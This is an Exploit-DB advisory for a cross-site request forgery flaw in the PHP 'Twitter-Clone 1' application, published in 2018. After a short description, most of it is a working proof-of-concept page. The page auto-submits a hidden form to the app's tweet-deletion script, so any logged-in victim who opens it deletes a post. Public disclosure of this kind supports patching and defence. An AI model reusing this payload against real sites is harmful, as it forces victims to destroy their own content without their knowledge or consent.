Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)

EDB-ID: 45232
Author: L0RD
Published: 2018-08-21
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: N/A

 # Date: 2018-08-21 
 # Exploit Author: L0RD 
 # Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/ 
 # Version: 1 
 # CVE: N/A 
 # Tested on: Win 10 
  
 # Description : 
 # An issue was discovered in Twitter-Clone 1 which allows a remote 
 # attacker to force any victim to delete posts. 
  
 # POC : 
 # Delete posts exploit : 
  
 <html> 
 <head> 
    <title>POC</title> 
 </head> 
 <body> 
 <form action='http://127.0.0.1/clone/twitter-clone/tweetdel.php?id="set 
 tweet id here of any post' method='post'> 
   <input type='hidden' name='id' value='set tweet id here of any post' /> 
 </form> 
    <script> 
       document.forms[0].submit(); 
    </script> 
 </body> 
 </html>

Source: www.exploit-db.com